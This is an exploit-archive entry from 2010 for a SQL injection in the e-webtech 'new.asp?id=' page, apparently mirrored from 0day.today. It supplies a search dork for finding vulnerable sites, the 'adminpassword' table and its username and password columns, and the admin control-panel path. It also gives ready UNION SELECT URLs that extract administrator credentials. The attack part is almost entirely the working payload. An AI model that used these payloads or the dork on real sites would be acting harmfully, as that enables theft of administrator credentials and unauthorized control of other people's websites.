id: 12180
date: 05/10/2010
title: e-webtech (new.asp) SQL Injection Vulnerability
author: algeria
cves: 

===================================================
e-webtech (new.asp?id=) SQL Injection Vulnerability
===================================================

************************************************************
** (new.asp?id=) SQL Injection Vulnerability
************************************************************
** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** Risk: high
** Title: (new.asp?id=) SQL Injection Vulnerability
** Dork: "Powerd by www.e-webtech.com"
************************************************************
** Discovred by: protocol
** From : algeria
** Contact : pre@live.fr
** *********************************************************
** Greet to :
** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb
** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N
************************************************************
** Exploit:
**
** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword
**
**
** Column: username | password & pw
**
**
** Control Panel: http://localhost.com/controlpanel/login.asp
**
** Example:
**
**
** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword
**
**
************************************************************ 



#  0day.today [2023-03-26]  #